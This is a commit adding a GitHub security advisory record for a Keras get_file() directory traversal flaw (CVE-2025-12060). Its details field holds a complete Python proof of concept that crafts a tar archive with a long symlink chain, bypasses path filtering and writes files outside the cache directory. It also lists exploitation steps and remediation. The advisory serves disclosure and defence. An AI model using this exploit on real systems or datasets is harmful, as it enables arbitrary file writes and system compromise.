Skip to content

Commit 97304e5

Browse files
1 parent 7d11a8d commit 97304e5

File tree

1 file changed

+84
-0
lines changed

1 file changed

+84
-0
lines changed
Lines changed: 84 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,84 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-hjqc-jx6g-rwp9",
4+
"modified": "2025-12-02T00:58:33Z",
5+
"published": "2025-12-02T00:58:33Z",
6+
"aliases": [
7+
"CVE-2025-12060"
8+
],
9+
"summary": "Keras Directory Traversal Vulnerability",
10+
"details": "## Summary\n\nKeras's `keras.utils.get_file()` function is vulnerable to directory traversal attacks despite implementing `filter_safe_paths()`. The vulnerability exists because `extract_archive()` uses Python's `tarfile.extractall()` method without the security-critical `filter=\"data\"` parameter. A PATH_MAX symlink resolution bug occurs before path filtering, allowing malicious tar archives to bypass security checks and write files outside the intended extraction directory.\n\n## Details\n\n### Root Cause Analysis\n\n**Current Keras Implementation**\n```python\n# From keras/src/utils/file_utils.py#L121\nif zipfile.is_zipfile(file_path):\n # Zip archive.\n archive.extractall(path)\nelse:\n # Tar archive, perhaps unsafe. Filter paths.\n archive.extractall(path, members=filter_safe_paths(archive))\n```\n\n### The Critical Flaw\n\nWhile Keras attempts to filter unsafe paths using `filter_safe_paths()`, this filtering happens after the tar archive members are parsed and before actual extraction. However, the PATH_MAX symlink resolution bug occurs during extraction, not during member enumeration.\n\n**Exploitation Flow:**\n1. **Archive parsing**: `filter_safe_paths()` sees symlink paths that appear safe\n2. **Extraction begins**: `extractall()` processes the filtered members\n3. **PATH_MAX bug triggers**: Symlink resolution fails due to path length limits\n4. **Security bypass**: Failed resolution causes literal path interpretation\n5. **Directory traversal**: Files written outside intended directory\n\n### Technical Details\n\nThe vulnerability exploits a known issue in Python's `tarfile` module where excessively long symlink paths can cause resolution failures, leading to the symlink being treated as a literal path. This bypasses Keras's path filtering because:\n\n- `filter_safe_paths()` operates on the parsed tar member information\n- The PATH_MAX bug occurs during actual file system operations in `extractall()`\n- Failed symlink resolution falls back to literal path interpretation\n- This allows traversal paths like `../../../../etc/passwd` to be written\n\n### Affected Code Location\n\n**File**: `keras/src/utils/file_utils.py` \n**Function**: `extract_archive()` around line 121 \n**Issue**: Missing `filter=\"data\"` parameter in `tarfile.extractall()`\n\n## Proof of Concept\n```\n#!/usr/bin/env python3\nimport os, io, sys, tarfile, pathlib, platform, threading, time\nimport http.server, socketserver\n\n# Import Keras directly (not through TensorFlow)\ntry:\n import keras\n print(\"Using standalone Keras:\", keras.__version__)\n get_file = keras.utils.get_file\nexcept ImportError:\n try:\n import tensorflow as tf\n print(\"Using Keras via TensorFlow:\", tf.keras.__version__)\n get_file = tf.keras.utils.get_file\n except ImportError:\n print(\"Neither Keras nor TensorFlow found!\")\n sys.exit(1)\n\nprint(\"=\" * 60)\nprint(\"Keras get_file() PATH_MAX Symlink Vulnerability PoC\")\nprint(\"=\" * 60)\nprint(\"Python:\", sys.version.split()[0])\nprint(\"Platform:\", platform.platform())\n\nroot = pathlib.Path.cwd()\nprint(f\"Working directory: {root}\")\n\n# Create target directory for exploit demonstration\nexploit_dir = root / \"exploit\"\nexploit_dir.mkdir(exist_ok=True)\n\n# Clean up any previous exploit files\ntry:\n (exploit_dir / \"keras_pwned.txt\").unlink()\nexcept FileNotFoundError:\n pass\n\nprint(f\"\\n=== INITIAL STATE ===\")\nprint(f\"Exploit directory: {exploit_dir}\")\nprint(f\"Files in exploit/: {[f.name for f in exploit_dir.iterdir()]}\")\n\n# Create malicious tar with PATH_MAX symlink resolution bug\nprint(f\"\\n=== Building PATH_MAX Symlink Exploit ===\")\n\n# Parameters for PATH_MAX exploitation\ncomp = 'd' * (55 if sys.platform == 'darwin' else 247)\nsteps = \"abcdefghijklmnop\" # 16-step symlink chain\npath = \"\"\n\nwith tarfile.open(\"keras_dataset.tgz\", mode=\"w:gz\") as tar:\n print(\"Creating deep symlink chain...\")\n \n # Build the symlink chain that will exceed PATH_MAX during resolution\n for i, step in enumerate(steps):\n # Directory with long name\n dir_info = tarfile.TarInfo(os.path.join(path, comp))\n dir_info.type = tarfile.DIRTYPE\n tar.addfile(dir_info)\n \n # Symlink pointing to that directory\n link_info = tarfile.TarInfo(os.path.join(path, step))\n link_info.type = tarfile.SYMTYPE\n link_info.linkname = comp\n tar.addfile(link_info)\n \n path = os.path.join(path, comp)\n \n if i < 3 or i % 4 == 0: # Print progress for first few and every 4th\n print(f\" Step {i+1}: {step} -> {comp[:20]}...\")\n \n # Create the final symlink that exceeds PATH_MAX\n # This is where the symlink resolution breaks down\n long_name = \"x\" * 254\n linkpath = os.path.join(\"/\".join(steps), long_name)\n \n max_link = tarfile.TarInfo(linkpath)\n max_link.type = tarfile.SYMTYPE\n max_link.linkname = (\"../\" * len(steps))\n tar.addfile(max_link)\n \n print(f\"✓ Created PATH_MAX symlink: {len(linkpath)} characters\")\n print(f\" Points to: {'../' * len(steps)}\")\n \n # Exploit file through the broken symlink resolution\n exploit_path = linkpath + \"/../../../exploit/keras_pwned.txt\"\n exploit_content = b\"KERAS VULNERABILITY CONFIRMED!\\nThis file was created outside the cache directory!\\nKeras get_file() is vulnerable to PATH_MAX symlink attacks!\\n\"\n \n exploit_file = tarfile.TarInfo(exploit_path)\n exploit_file.type = tarfile.REGTYPE\n exploit_file.size = len(exploit_content)\n tar.addfile(exploit_file, fileobj=io.BytesIO(exploit_content))\n \n print(f\"✓ Added exploit file via broken symlink path\")\n \n # Add legitimate dataset content\n dataset_content = b\"# Keras Dataset Sample\\nThis appears to be a legitimate ML dataset\\nimage1.jpg,cat\\nimage2.jpg,dog\\nimage3.jpg,bird\\n\"\n dataset_file = tarfile.TarInfo(\"dataset/labels.csv\")\n dataset_file.type = tarfile.REGTYPE\n dataset_file.size = len(dataset_content)\n tar.addfile(dataset_file, fileobj=io.BytesIO(dataset_content))\n \n # Dataset directory\n dataset_dir = tarfile.TarInfo(\"dataset/\")\n dataset_dir.type = tarfile.DIRTYPE\n tar.addfile(dataset_dir)\n\nprint(\"✓ Malicious Keras dataset created\")\n\n# Comparison Test: Python tarfile with filter (SAFE)\nprint(f\"\\n=== COMPARISON: Python tarfile with data filter ===\")\ntry:\n with tarfile.open(\"keras_dataset.tgz\", \"r:gz\") as tar:\n tar.extractall(\"python_safe\", filter=\"data\")\n \n files_after = [f.name for f in exploit_dir.iterdir()]\n print(f\"✓ Python safe extraction completed\")\n print(f\"Files in exploit/: {files_after}\")\n \n # Cleanup\n import shutil\n if pathlib.Path(\"python_safe\").exists():\n shutil.rmtree(\"python_safe\", ignore_errors=True)\n \nexcept Exception as e:\n print(f\"❌ Python safe extraction blocked: {str(e)[:80]}...\")\n files_after = [f.name for f in exploit_dir.iterdir()]\n print(f\"Files in exploit/: {files_after}\")\n\n# Start HTTP server to serve malicious archive\nclass SilentServer(http.server.SimpleHTTPRequestHandler):\n def log_message(self, *args): pass\n\ndef run_server():\n with socketserver.TCPServer((\"127.0.0.1\", 8005), SilentServer) as httpd:\n httpd.allow_reuse_address = True\n httpd.serve_forever()\n\nserver = threading.Thread(target=run_server, daemon=True)\nserver.start()\ntime.sleep(0.3)\n\n# Keras vulnerability test\ncache_dir = root / \"keras_cache\"\ncache_dir.mkdir(exist_ok=True)\nurl = \"http://127.0.0.1:8005/keras_dataset.tgz\"\n\nprint(f\"\\n=== KERAS VULNERABILITY TEST ===\")\nprint(f\"Testing: keras.utils.get_file() with extract=True\")\nprint(f\"URL: {url}\")\nprint(f\"Cache: {cache_dir}\")\nprint(f\"Expected extraction: keras_cache/datasets/keras_dataset/\")\nprint(f\"Exploit target: exploit/keras_pwned.txt\")\n\ntry:\n # The vulnerable Keras call\n extracted_path = get_file(\n \"keras_dataset\",\n url,\n cache_dir=str(cache_dir),\n extract=True\n )\n print(f\"✓ Keras extraction completed\")\n print(f\"✓ Returned path: {extracted_path}\")\n \nexcept Exception as e:\n print(f\"❌ Keras extraction failed: {e}\")\n import traceback\n traceback.print_exc()\n\n# Vulnerability assessment\nprint(f\"\\n=== VULNERABILITY RESULTS ===\")\nfinal_exploit_files = [f.name for f in exploit_dir.iterdir()]\nprint(f\"Files in exploit directory: {final_exploit_files}\")\n\nif \"keras_pwned.txt\" in final_exploit_files:\n print(f\"\\n🚨 KERAS VULNERABILITY CONFIRMED! 🚨\")\n \n exploit_file = exploit_dir / \"keras_pwned.txt\"\n content = exploit_file.read_text()\n print(f\"Exploit file created: {exploit_file}\")\n print(f\"Content:\\n{content}\")\n \n print(f\"🔍 TECHNICAL DETAILS:\")\n print(f\" • Keras uses tarfile.extractall() without filter parameter\")\n print(f\" • PATH_MAX symlink resolution bug bypassed security checks\")\n print(f\" • File created outside intended cache directory\")\n print(f\" • Same vulnerability pattern as TensorFlow get_file()\")\n \n print(f\"\\n📊 COMPARISON RESULTS:\")\n print(f\" ✅ Python with filter='data': BLOCKED exploit\")\n print(f\" ⚠️ Keras get_file(): ALLOWED exploit\")\n \nelse:\n print(f\"✅ No exploit files detected\")\n print(f\"Possible reasons:\")\n print(f\" • Keras version includes security patches\")\n print(f\" • Platform-specific path handling prevented exploit\")\n print(f\" • Archive extraction path differed from expected\")\n\n# Show what Keras actually extracted (safely)\nprint(f\"\\n=== KERAS EXTRACTION ANALYSIS ===\")\ntry:\n if 'extracted_path' in locals() and pathlib.Path(extracted_path).exists():\n keras_path = pathlib.Path(extracted_path)\n print(f\"Keras extracted to: {keras_path}\")\n \n # Safely list contents\n try:\n contents = [item.name for item in keras_path.iterdir()]\n print(f\"Top-level contents: {contents}\")\n \n # Count symlinks (indicates our exploit structure was created)\n symlink_count = 0\n for item in keras_path.iterdir():\n try:\n if item.is_symlink():\n symlink_count += 1\n except PermissionError:\n continue\n \n print(f\"Symlinks created: {symlink_count}\")\n if symlink_count > 0:\n print(f\"✓ PATH_MAX symlink chain was extracted\")\n \n except PermissionError:\n print(f\"Permission errors in extraction directory (expected with symlink corruption)\")\n \nexcept Exception as e:\n print(f\"Could not analyze Keras extraction: {e}\")\n\nprint(f\"\\n=== REMEDIATION ===\")\nprint(f\"To fix this vulnerability, Keras should use:\")\nprint(f\"```python\")\nprint(f\"tarfile.extractall(path, filter='data') # Safe\")\nprint(f\"```\")\nprint(f\"Instead of:\")\nprint(f\"```python\") \nprint(f\"tarfile.extractall(path) # Vulnerable\")\nprint(f\"```\")\n\n# Cleanup\nprint(f\"\\n=== CLEANUP ===\")\ntry:\n os.unlink(\"keras_dataset.tgz\")\n print(f\"✓ Removed malicious tar file\")\nexcept:\n pass\n\nprint(\"PoC completed!\")\n\n```\n### Environment Setup\n- **Python**: 3.8+ (tested on multiple versions)\n- **Keras**: Standalone Keras or TensorFlow.Keras\n- **Platform**: Linux, macOS, Windows (path handling varies)\n\n### Exploitation Steps\n\n1. **Create malicious tar archive** with PATH_MAX symlink chain\n2. **Host archive** on accessible HTTP server\n3. **Call `keras.utils.get_file()`** with `extract=True`\n4. **Observe directory traversal** - files written outside cache directory\n\n### Key Exploit Components\n\n- **Deep symlink chain**: 16+ nested symlinks with long directory names\n- **PATH_MAX overflow**: Final symlink path exceeding system limits\n- **Traversal payload**: Relative path traversal (`../../../target/file`)\n- **Legitimate disguise**: Archive contains valid-looking dataset files\n\n### Demonstration Results\n\n**Vulnerable behavior:**\n- Files extracted outside intended `cache_dir/datasets/` location\n- Security filtering bypassed completely\n- No error or warning messages generated\n\n**Expected secure behavior:**\n- Extraction blocked or confined to cache directory\n- Security warnings for suspicious archive contents\n\n## Impact\n\n### Vulnerability Classification\n- **Type**: Directory Traversal / Path Traversal (CWE-22)\n- **Severity**: High\n- **CVSS Components**: Network accessible, no authentication required, impacts confidentiality and integrity\n\n### Who Is Impacted\n\n**Direct Impact:**\n- Applications using `keras.utils.get_file()` with `extract=True`\n- Machine learning pipelines downloading and extracting datasets\n- Automated ML training systems processing external archives\n\n**Attack Scenarios:**\n1. **Malicious datasets**: Attacker hosts compromised ML dataset\n2. **Supply chain**: Legitimate dataset repositories compromised\n3. **Model poisoning**: Extraction writes malicious files alongside training data\n4. **System compromise**: Configuration files, executables written to system directories\n\n**Affected Environments:**\n- Research environments downloading public datasets\n- Production ML systems with automated dataset fetching\n- Educational platforms using Keras for tutorials\n- CI/CD pipelines training models with external data\n\n### Risk Assessment\n\n**High Risk Factors:**\n- Common usage pattern in ML workflows\n- No user awareness of extraction security\n- Silent failure mode (no warnings)\n- Cross-platform vulnerability\n\n**Potential Consequences:**\n- Arbitrary file write on target system\n- Configuration file tampering\n- Code injection via overwritten scripts\n- Data exfiltration through planted files\n- System compromise in containerized environments\n\n## Recommended Fix\n\n### Immediate Mitigation\n\nReplace the vulnerable extraction code with:\n\n```python\n# Secure implementation\nif zipfile.is_zipfile(file_path):\n # Zip archive - implement similar filtering\n archive.extractall(path, members=filter_safe_paths(archive))\nelse:\n # Tar archive with proper security filter\n archive.extractall(path, members=filter_safe_paths(archive), filter=\"data\")\n```\n\n### Long-term Solution\n\n1. **Add `filter=\"data\"` parameter** to all `tarfile.extractall()` calls\n2. **Implement comprehensive path validation** before extraction\n3. **Add extraction logging** for security monitoring\n4. **Consider sandboxed extraction** for untrusted archives\n5. **Update documentation** to warn about archive security risks\n\n### Backward Compatibility\n\nThe fix maintains full backward compatibility as `filter=\"data\"` is the recommended secure default for Python 3.12+.\n\n## References\n\n- [[Python tarfile security documentation](https://docs.python.org/3/library/tarfile.html#extraction-filters)](https://docs.python.org/3/library/tarfile.html#extraction-filters)\n- [[CVE-2007-4559](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4559)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4559) - Related tarfile vulnerability\n- [[OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)](https://owasp.org/www-community/attacks/Path_Traversal)\n\nNote: Reported in Huntr as well, but didn't get response\nhttps://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
15+
},
16+
{
17+
"type": "CVSS_V4",
18+
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
19+
}
20+
],
21+
"affected": [
22+
{
23+
"package": {
24+
"ecosystem": "PyPI",
25+
"name": "keras"
26+
},
27+
"ranges": [
28+
{
29+
"type": "ECOSYSTEM",
30+
"events": [
31+
{
32+
"introduced": "0"
33+
},
34+
{
35+
"fixed": "3.12.0"
36+
}
37+
]
38+
}
39+
],
40+
"database_specific": {
41+
"last_known_affected_version_range": "<= 3.11.3"
42+
}
43+
}
44+
],
45+
"references": [
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9"
49+
},
50+
{
51+
"type": "ADVISORY",
52+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060"
53+
},
54+
{
55+
"type": "ADVISORY",
56+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12638"
57+
},
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/keras-team/keras/pull/21760"
61+
},
62+
{
63+
"type": "WEB",
64+
"url": "https://github.com/keras-team/keras/commit/47fcb397ee4caffd5a75efd1fa3067559594e951"
65+
},
66+
{
67+
"type": "PACKAGE",
68+
"url": "https://github.com/keras-team/keras"
69+
},
70+
{
71+
"type": "WEB",
72+
"url": "https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4"
73+
}
74+
],
75+
"database_specific": {
76+
"cwe_ids": [
77+
"CWE-22"
78+
],
79+
"severity": "HIGH",
80+
"github_reviewed": true,
81+
"github_reviewed_at": "2025-12-02T00:58:33Z",
82+
"nvd_published_at": null
83+
}
84+
}

0 commit comments

Comments
 (0)